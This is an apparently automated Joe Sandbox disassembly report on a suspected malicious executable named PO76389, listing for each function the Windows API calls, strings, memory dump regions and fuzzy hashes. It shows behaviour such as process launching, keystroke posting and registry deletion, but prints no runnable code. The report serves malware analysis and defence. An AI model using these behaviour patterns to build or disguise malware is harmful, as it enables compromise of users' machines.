                                                    • API String ID:
                                                    • Opcode ID: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                    • Instruction ID: 5031b81a3c7c5d7f33048ffa29b9daaae25c2013eba8242a485797ad78a122fc
                                                    • Opcode Fuzzy Hash: 5d6c13809a69d485a9264ca59fae67ba5c9f2f937ebcddb7d64337b968c9f3f1
                                                    • Instruction Fuzzy Hash: 4B716D75904109FFCB08CF98DC89EAEBB78FF85318F14815EF915A6251C7349A12CBA8
                                                    APIs
                                                    • _memset.LIBCMT ref: 0051214B
                                                    • _memset.LIBCMT ref: 00512214
                                                    • ShellExecuteExW.SHELL32(?), ref: 00512259
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00512320
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0051232F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 4082843840-2766056989
                                                    • Opcode ID: 045128b422b001b3bfad202e124fc326cbd80567c6360c3d86057d1fdce94973
                                                    • Instruction ID: 36c53da3840b48fbbf1e30e4b8688e382f8a07e7b9ddc6364da5446b185cd1ed
                                                    • Opcode Fuzzy Hash: 045128b422b001b3bfad202e124fc326cbd80567c6360c3d86057d1fdce94973
                                                    • Instruction Fuzzy Hash: AA718B74A00619AFCB04EFA5C8919DEBBF5FF48314F00845EE856AB351DB34AD90CB94
                                                    APIs
                                                    • GetParent.USER32(?), ref: 004F481D
                                                    • GetKeyboardState.USER32(?), ref: 004F4832
                                                    • SetKeyboardState.USER32(?), ref: 004F4893
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004F48C1
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004F48E0
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 004F4926
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004F4949
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 474bd004dcf7391843d27fbe55a7be4495f9418b66fc2566a728a7e675570c42
                                                    • Instruction ID: 4f18ad4d3d56e3a2f9621ac4ae50685539b702ee4286077e3d41c9e41c450006
                                                    • Opcode Fuzzy Hash: 474bd004dcf7391843d27fbe55a7be4495f9418b66fc2566a728a7e675570c42
                                                    • Instruction Fuzzy Hash: 7251E5A06087D93DFB3652348C05FBB7EA95B86344F08858AE3D5469C3CADCEC88D764
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 004F4638
                                                    • GetKeyboardState.USER32(?), ref: 004F464D
                                                    • SetKeyboardState.USER32(?), ref: 004F46AE
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004F46DA
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004F46F7
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004F473B
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004F475C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 77cf80bdf8e64910face753162a5f00122a25d9f275056bf24f21736315dd743
                                                    • Instruction ID: 7495a74c62d22dcddc44920eb24e5b9345094dec13c0394c4d6ab8b86949283b
                                                    • Opcode Fuzzy Hash: 77cf80bdf8e64910face753162a5f00122a25d9f275056bf24f21736315dd743
                                                    • Instruction Fuzzy Hash: 775108A05047D93DFB3657248C45B77BFE99B86304F08448AE2D486AC2DB9CEC98D768
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: a3c6430157660939f88053500201a75d98d8f4a9004f49db0c80faf002e16dd5
                                                    • Instruction ID: 46ac5b1429e79ce5222b88d45555d428a6666edce3be2a6740618bc869e6dd10
                                                    • Opcode Fuzzy Hash: a3c6430157660939f88053500201a75d98d8f4a9004f49db0c80faf002e16dd5
                                                    • Instruction Fuzzy Hash: 4C418E65C1021875CF11FBA58C86ACFB7ACEF15314F50846BFA14F3221EA78E65187A9
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00513C92
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00513CBC
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00513D71
                                                      • Part of subcall function 00513C63: RegCloseKey.ADVAPI32(?), ref: 00513CD9
                                                      • Part of subcall function 00513C63: FreeLibrary.KERNEL32(?), ref: 00513D2B
                                                      • Part of subcall function 00513C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00513D4E
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00513D16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 030ae1e96fc0eb4d704760fe33873fa75c60340ecff7250f2d8f29cb5c86078a
                                                    • Instruction ID: 90d00dbef1f258d356bb83044a5af6c0d36d00cfcb0613de627d91ac8eb681bb
                                                    • Opcode Fuzzy Hash: 030ae1e96fc0eb4d704760fe33873fa75c60340ecff7250f2d8f29cb5c86078a
                                                    • Instruction Fuzzy Hash: B3310FB1901109BFEB159B94EC99EFEBBBCFF18344F000569E512A2150E6709F89DBB0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00518DF4
                                                    • GetWindowLongW.USER32(00D6A7C8,000000F0), ref: 00518E27
                                                    • GetWindowLongW.USER32(00D6A7C8,000000F0), ref: 00518E5C
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00518E8E
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00518EB8
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00518EC9
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00518EE3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: 755afdfe7a4de79dcdea76b425785f4ed537725421fade39ba667a51d2873ed3
                                                    • Instruction ID: 5c61b17186be2adace49c901014454a938e3a5958bce6379b5e6a6acd1fa3f33
                                                    • Opcode Fuzzy Hash: 755afdfe7a4de79dcdea76b425785f4ed537725421fade39ba667a51d2873ed3
                                                    • Instruction Fuzzy Hash: 63313431600611AFEB20DF58EC85FA53BB9FB5A314F184264F5158B2B2CF71A884EB51
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1734
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F175A
                                                    • SysAllocString.OLEAUT32(00000000), ref: 004F175D
                                                    • SysAllocString.OLEAUT32(?), ref: 004F177B
                                                    • SysFreeString.OLEAUT32(?), ref: 004F1784
                                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 004F17A9
                                                    • SysAllocString.OLEAUT32(?), ref: 004F17B7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: e209ad801ff50754a873404e80f67807b8631f34bc248cce8fe949162b0a587e
                                                    • Instruction ID: 2fadea502ceb8eb04a722a8b72cc972007782aeb19e3b2fd8f9b7605f0851af9
                                                    • Opcode Fuzzy Hash: e209ad801ff50754a873404e80f67807b8631f34bc248cce8fe949162b0a587e
                                                    • Instruction Fuzzy Hash: 3D215175600219AF9B10EBA9DC88DBF73FCEB09360B408126FA19DB360D674EC459764
                                                    APIs
                                                      • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 004F6A2B
                                                    • _wcscmp.LIBCMT ref: 004F6A49
                                                    • MoveFileW.KERNEL32(?,?), ref: 004F6A62
                                                      • Part of subcall function 004F6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                      • Part of subcall function 004F6D6D: GetLastError.KERNEL32 ref: 004F6DC5
                                                      • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                    • _wcscat.LIBCMT ref: 004F6AA4
                                                    • SHFileOperationW.SHELL32(?), ref: 004F6B0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2323102230-1173974218
                                                    • Opcode ID: 5e39b6efbbbe4cf561436e3f15899c614e376b6189b7314fd7718f1bb24539a1
                                                    • Instruction ID: b8934dcb58b9fc261e35234c234f7cbfd861e7d1f9d49cb11c1eefe7682d87a8
                                                    • Opcode Fuzzy Hash: 5e39b6efbbbe4cf561436e3f15899c614e376b6189b7314fd7718f1bb24539a1
                                                    • Instruction Fuzzy Hash: EF313571C0021C6ACF50EFA4D845AEEB7B89F08304F5045DBE605E3251EB399B49CB68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: ab8b1e33255d9e086d1cfb5ad8cf0d0a2ba90f2c23537be101c7ba5b2786917b
                                                    • Instruction ID: f8d8df30d326bfea62dea793448596f8f09991bbd9e5d3afc96de2e095a0420a
                                                    • Opcode Fuzzy Hash: ab8b1e33255d9e086d1cfb5ad8cf0d0a2ba90f2c23537be101c7ba5b2786917b
                                                    • Instruction Fuzzy Hash: 74213A311045197AD230AA359D02FBB73A8AF55319F10402FFA4587389EFDD9E82D2AD
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F180D
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004F1833
                                                    • SysAllocString.OLEAUT32(00000000), ref: 004F1836
                                                    • SysAllocString.OLEAUT32 ref: 004F1857
                                                    • SysFreeString.OLEAUT32 ref: 004F1860
                                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 004F187A
                                                    • SysAllocString.OLEAUT32(?), ref: 004F1888
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 5ea630d3b666acfff71d72f6c57bda7dd043e3dfc7515841158f8497b6f7f10c
                                                    • Instruction ID: b20d40db1a4df0f0a9af34a066665c2b70c71747ed0d0f195d4031b59e22ccb7
                                                    • Opcode Fuzzy Hash: 5ea630d3b666acfff71d72f6c57bda7dd043e3dfc7515841158f8497b6f7f10c
                                                    • Instruction Fuzzy Hash: A0217435600208AFDB10ABA9DC88DBFB7FCEB093A0B408126FA15DB360D674EC459764
                                                    APIs
                                                      • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                      • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                      • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0051A13B
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0051A148
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0051A153
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0051A162
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0051A16E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 99d3d113c85cf7a4a82e48ec40efe2b7a6b48a109cc43229be36cc2081b1c60a
                                                    • Instruction ID: 85cf1029a4286a69af21a40f33c812d45be0f56bef466f88ac436e96a1710642
                                                    • Opcode Fuzzy Hash: 99d3d113c85cf7a4a82e48ec40efe2b7a6b48a109cc43229be36cc2081b1c60a
                                                    • Instruction Fuzzy Hash: FD118EB1150219BEEF114F65CC86EE77F6DFF08798F014215FA08A60A0C7769C61DBA4
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 004D4C3E
                                                      • Part of subcall function 004D86B5: GetLastError.KERNEL32(?,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D86B7
                                                      • Part of subcall function 004D86B5: __calloc_crt.LIBCMT ref: 004D86D8
                                                      • Part of subcall function 004D86B5: GetCurrentThreadId.KERNEL32 ref: 004D8701
                                                      • Part of subcall function 004D86B5: SetLastError.KERNEL32(00000000,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D8719
                                                    • CloseHandle.KERNEL32(?,?,004D4C1D), ref: 004D4C52
                                                    • __freeptd.LIBCMT ref: 004D4C59
                                                    • RtlExitUserThread.NTDLL(00000000,?,004D4C1D), ref: 004D4C61
                                                    • GetLastError.KERNEL32(?,?,004D4C1D), ref: 004D4C91
                                                    • RtlExitUserThread.NTDLL(00000000,?,?,004D4C1D), ref: 004D4C98
                                                    • __freefls@4.LIBCMT ref: 004D4CB4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1445074172-0
                                                    • Opcode ID: a631a3dbe2a9701184f8331558a85b287a7749b1e6aef838794c2ea07e1d508f
                                                    • Instruction ID: c3f0326f9fd6a0ea7737a821a5d19afae272f3faf6f84eec7b7d46de2cb0f237
                                                    • Opcode Fuzzy Hash: a631a3dbe2a9701184f8331558a85b287a7749b1e6aef838794c2ea07e1d508f
                                                    • Instruction Fuzzy Hash: CF01D470401601AFC718BB75E92992E77B5EF54718710851FF4098B352EF3DD8468A69
                                                    APIs
                                                    • _memset.LIBCMT ref: 0051E14D
                                                    • _memset.LIBCMT ref: 0051E15C
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00573EE0,00573F24), ref: 0051E18B
                                                    • CloseHandle.KERNEL32 ref: 0051E19D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID: $?W$>W
                                                    • API String ID: 3277943733-2305796706
                                                    • Opcode ID: 005e39c4e535fe7dcc544275018a18908c24f230ecafddf98638de40ff020d09
                                                    • Instruction ID: 7ec5c0e2da16911bf0b00b020667609913f0224c46cb35a91b14d0717aded148
                                                    • Opcode Fuzzy Hash: 005e39c4e535fe7dcc544275018a18908c24f230ecafddf98638de40ff020d09
                                                    • Instruction Fuzzy Hash: 4EF030F1940310BAF3106B65BC16F777AACEB153A4F004421FE08D52A1D2BA4E54F6B9
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004CC6C0
                                                    • GetWindowRect.USER32(?,?), ref: 004CC701
                                                    • ScreenToClient.USER32(?,?), ref: 004CC729
                                                    • GetClientRect.USER32(?,?), ref: 004CC856
                                                    • GetWindowRect.USER32(?,?), ref: 004CC86F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
